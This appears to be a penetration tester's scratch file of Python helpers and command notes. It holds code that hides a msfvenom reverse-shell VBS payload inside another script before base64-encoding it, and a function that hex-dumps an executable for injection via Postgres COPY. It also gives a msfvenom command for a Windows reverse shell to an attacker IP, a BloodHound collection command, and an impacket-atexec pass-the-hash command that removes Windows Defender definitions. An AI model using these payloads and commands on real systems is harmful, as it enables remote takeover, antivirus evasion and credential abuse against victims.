import binascii
def convertDLLtoHex():
with open('somefilehere.exe', 'rb') as f:
# Slurp the whole file and efficiently convert it to hex all at once
hexdata = binascii.hexlify(f.read())
return hexdata.decode('utf-8')
def enableHTTPdebug():
try:
import http.client as http_client
except ImportError:
# Python 2
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
### The purpose of this script is to remove all the comments and newlines, also insert the msf vbs into the script before quit() is called to not break any functionalities. And then we can use that to inject to local with postgrep COPY to
import re
def convertOneliner(filename):
with open(filename, "r") as f:
data = f.read()
## Remove all comments
res = re.sub('\\'.*', "",data, re.DOTALL)
## Remove _ new lines
res =re.sub('\\s_.*?\\n', "",res, re.DOTALL)
res = re.sub('\\t', '',res)
res = re.sub('\\n', ':', res)
#res = re.sub("\\s\\s+", " ", res)
res = re.sub("::", ":",res)
res = re.sub("::", ":",res)
res = re.sub("::", ":",res)
return res
#msfvenom -a x86 --plaTform windows -p windows/shell_reverse_tcp LHOST=192.168.119.243 LPORT=4444 -e x86/shikata_ga_nai -f vbs -o testme.vbs
def combindStrings():
res1 = convertOneliner("testme.vbs")
res2 = convertOneliner("wmiget.vbs")
array= res2.split(':')
array.insert(-2, res1)
finalstring = ':'.join(array)
return finalstring
# Catch it like this
res = base64.b64encode(convertVBSoneliner.combindStrings().encode('utf-8'))
print(res.decode('utf-8'))
python3 bloodhound -d DOMAIN.LOCAL -dc DC-IP -c All,LocalAdmin -u machineaccount\\$ -p :hash -v --zip
https://docs.python.org/3/library/cmd.html
impacket-atexec [email protected] 'cmd /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All' -hashes :xxxx -debug